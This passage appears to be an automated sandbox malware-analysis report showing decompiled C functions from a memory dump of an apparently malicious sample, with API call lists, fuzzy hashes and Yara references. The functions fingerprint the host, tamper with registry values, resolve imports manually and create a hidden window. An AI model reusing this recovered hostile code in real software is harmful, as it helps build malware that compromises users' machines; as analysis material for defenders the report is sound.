									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x9e684; // 0xe9f8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0xe9f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x00084a0b
0x00084a18
0x00084a23
0x00084a28
0x00084a2a
0x00084a2d
0x00084a32
0x00084a35
0x00084a3f
0x00084a41
0x00084a4e
0x00084a57
0x00084a57
0x00084a64
0x00084a7f
0x00084a86
0x00084a88
0x00084a8d
0x00084a92
0x00084a98
0x00084aa7
0x00084ac6
0x00084ac8
0x00084ace
0x00084ad4
0x00084ad9
0x00084add
0x00084ae0
0x00084aea
0x00084aec
0x00084aed
0x00084af8
0x00084afa
0x00084afd
0x00084b02
0x00084b09
0x00084b5e
0x00084b5e
0x00084b63
0x00084bca
0x00084bcf
0x00084bd1
0x00084bdb
0x00084be0
0x00084be0
0x00084bf5
0x00084bfa
0x00084bfc
0x00084bff
0x00084c01
0x00000000
0x00000000
0x00084c07
0x00084c11
0x00084c1a
0x00084c1f
0x00084c22
0x00084c28
0x00084c2e
0x00084c36
0x00084c38
0x00084c3b
0x00084c3c
0x00084c41
0x00084c44
0x00084c47
0x00084c49
0x00084c4d
0x00084c4d
0x00084c52
0x00084c55
0x00084c57
0x00084c5b
0x00084c5b
0x00084c62
0x00084c67
0x00084c69
0x00084c6d
0x00084c6f
0x00084c75
0x00084c79
0x00084c7c
0x00084c7d
0x00084c82
0x00084c85
0x00084c8a
0x00084cb2
0x00084cb8
0x00084cbf
0x00084cce
0x00084cd3
0x00000000
0x00084cd3
0x00084cc1
0x00000000
0x00084c8c
0x00084c8c
0x00084c91
0x00084c98
0x00084cdd
0x00084cdd
0x00084ce4
0x00084ce8
0x00084ce9
0x00084ce9
0x00084cf3
0x00084cf8
0x00084cfb
0x00084cfc
0x00084cfe
0x00084d00
0x00084d05
0x00084d0c
0x00084d4f
0x00084d0e
0x00084d13
0x00084d1b
0x00084d1f
0x00084d2a
0x00084d35
0x00084d3d
0x00084d41
0x00084d49
0x00084d49
0x00084d0c
0x00084d55
0x00084d58
0x00084d5a
0x00084d60
0x00084d60
0x00084d62
0x00084d62
0x00000000
0x00084d62
0x00084c9a
0x00084c9a
0x00084ca0
0x00084ca2
0x00084ca7
0x00084ca7
0x00084ca9
0x00084cd8
0x00000000
0x00084cd8
0x00084cab
0x00084ae4
0x00084ae4
0x00000000
0x00084ae4
0x00084c8a
0x00084b69
0x00084b77
0x00084b8a
0x00084b8f
0x00084b95
0x00084b97
0x00084baf
0x00084bb4
0x00084bbd
0x00084bc3
0x00000000
0x00084bc3
0x00084b9f
0x00084ba8
0x00000000
0x00084ba8
0x00084b0b
0x00084b11
0x00084b13
0x00084b51
0x00084b53
0x00000000
0x00000000
0x00084b55
0x00084b59
0x00000000
0x00084b59
0x00084b15
0x00084b1f
0x00084b2b
0x00084b36
0x00084b3d
0x00084b47
0x00084b4c
0x00000000
0x00084b4c
0x00084ae2
0x00000000
0x00084a66
0x00084a71
0x00084a77
0x00084a79
0x00084d64
0x00084d64
0x00084d66
0x00084d6c
0x00084d6c
0x00000000
0x00084a79

APIs

memset.MSVCRT ref: 00084A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
lstrcatW.KERNEL32 ref: 00084D3D
lstrcatW.KERNEL32 ref: 00084D41
lstrcatW.KERNEL32 ref: 00084D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: a5dc98278c51056b20f5ad4c48acfda892f66f4e91ce1b005a64c70370a8f86c
Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
Opcode Fuzzy Hash: a5dc98278c51056b20f5ad4c48acfda892f66f4e91ce1b005a64c70370a8f86c
Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92

Uniqueness

Uniqueness Score: -1.00%

Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}

0x0008b7a8
0x0008b7b1
0x0008b7bd
0x0008b7c3
0x0008b7c5
0x0008b7cd
0x0008b7e0
0x0008b7ef
0x0008b7fa
0x0008b807
0x0008b821
0x0008b826
0x0008b828
0x0008b82f
0x0008b83f
0x0008b850
0x0008b85a
0x0008b862
0x0008b869
0x0008b86c
0x0008b889

APIs

memset.MSVCRT ref: 0008B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821

Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D

lstrcatW.KERNEL32 ref: 0008B85A
CharUpperBuffW.USER32(?,00000000), ref: 0008B86C

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60

Uniqueness

Uniqueness Score: -1.00%

Function 000861B4, Relevance: 7.6, APIs: 5, Instructions: 145
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E00088604(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						RegCloseKey(_v8);
					}
					E0008861A( &_v32, 0x3fff); // executed
					E0008861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0xe9fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0xe9fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0xe9fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0xe9fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0xe9fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x000861b4
0x000861b4
0x000861c0
0x000861cf
0x000861d2
0x000861dc
0x000861e4
0x000861e7
0x000861ea
0x000861ef
0x000861f1
0x000861f4
0x000861f9
0x00086365
0x00086369
0x00086369
0x00086209
0x0008620b
0x00086211
0x00000000
0x00000000
0x00086234
0x00086333
0x00086337
0x00086341
0x00086341
0x0008634d
0x0008635b
0x00000000
0x00086360
0x0008623d
0x00086241
0x00086245
0x00086249
0x0008624d
0x0008624e
0x0008624f
0x00086250
0x00086251
0x00086255
0x0008625c
0x0008625d
0x00086262
0x0008626d
0x00086282
0x00086284
0x00000000
0x00000000
0x0008628a
0x0008628d
0x00086295
0x000862a2
0x000862a7
0x000862aa
0x000862b3
0x000862ba
0x000862ca
0x000862d4
0x000862da
0x000862dc
0x000862e1
0x000862ea
0x000862ec
0x000862ee
0x000862f0
0x000862fa
0x00086300
0x00086304
0x00086308
0x0008630d
0x00086313
0x00086315
0x00086317
0x00086317
0x0008631e
0x0008631e
0x00086304
0x00086323
0x00086323
0x00086326
0x00086327
0x0008632a
0x0008632a
0x00000000
0x0008628d
0x0008626f
0x00086277
0x00000000

APIs

memset.MSVCRT ref: 000861D2

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
memset.MSVCRT ref: 00086295
memset.MSVCRT ref: 000862A2
RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 00086341

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memset$AllocateCloseHeapOpen
String ID:
API String ID: 1886988140-0
Opcode ID: 93ce28d5d0d56b15f8c62ba43f04e9097e84cfe134075291ab19f69f0add594f
Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
Opcode Fuzzy Hash: 93ce28d5d0d56b15f8c62ba43f04e9097e84cfe134075291ab19f69f0add594f
Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x0008cf87
0x0008cf89
0x0008cf90
0x0008cf98
0x0008cfa2
0x0008cfa2
0x0008cfa8
0x0008cfb1
0x0008cfb7
0x0008cfb9
0x0008cfbd
0x0008cfbd
0x0008cfc2
0x0008cfc8
0x0008cfd8
0x0008cfe2
0x0008cfea
0x0008cfed
0x0008cff9
0x0008cfff
0x0008d004
0x0008d00a
0x0008d010
0x0008d016
0x0008d01e

APIs

GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
memset.MSVCRT ref: 0008CFE2
GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x000924a1
0x000924a9
0x000924be
0x000924d0
0x000924dc
0x000924e2
0x000924e7
0x000924f3
0x0009265e
0x00000000
0x0009265e
0x000924f9
0x00092502
0x00092510
0x00092513
0x00092522
0x00092522
0x00092529
0x00092537
0x0009253a
0x00092551
0x00092557
0x0009255e
0x0009256e
0x00092586
0x00092570
0x00092578
0x00092578
0x00092589
0x0009258d
0x00092599
0x0009259d
0x000925a1
0x000925a5
0x000925b1
0x000925dc
0x000925e4
0x000925f6
0x00092602
0x000925b3
0x000925b8
0x000925c3
0x000925cf
0x000925cf
0x0009260b
0x00092611
0x0009261b
0x00092637
0x0009261d
0x0009262c
0x0009262c
0x0009261b
0x0009263f
0x00092648
0x00092648
0x00092656
0x00000000
0x00092656
0x00092562
0x00000000
0x00092562
0x00000000
0x0009253a
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
LoadLibraryA.KERNEL32(00000000), ref: 00092551

Strings

GetProcAddress, xrefs: 000924C1
kernel32.dll, xrefs: 000924B3

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0xe9f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0xe9fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x60316
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0xe9fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0xe9fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0xe9fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0xe9fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0xe9fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0xe9fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x00082ee3
0x00082ef2
0x00082ef9
0x00082efe
0x00082f18
0x00082f20
0x00082f2d
0x00082f34
0x00082f3a
0x00082f41
0x00082f42
0x00082f47
0x00082f50
0x00082fcd
0x00082fcd
0x00082fd4
0x00082fd7
0x00082fdc
0x00082fdc
0x00082fdf
0x00082fe7
0x00082fec
0x00082ff4
0x00082ff4
0x00082f77
0x00082f7a
0x00082f81
0x00000000
0x00000000
0x00082f8a
0x00082f8d
0x00082f98
0x00082fba
0x00082fc1
0x00082fc6
0x00082fcb
0x00000000
0x00000000
0x00082fa0
0x00000000
0x00000000
0x00082fa6
0x00082fab
0x00082fb2
0x00082fb7
0x00082fb7
0x00000000

APIs

memset.MSVCRT ref: 00082EF9
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
ShowWindow.USER32(00000000,00000000), ref: 00082F8A

Strings

0, xrefs: 00082F2D

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Window$CreateShowmemset
String ID: 0
API String ID: 3027179219-4108050209
Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0xe9fdb0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0xe9fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0xe9fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0xe9fdb0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
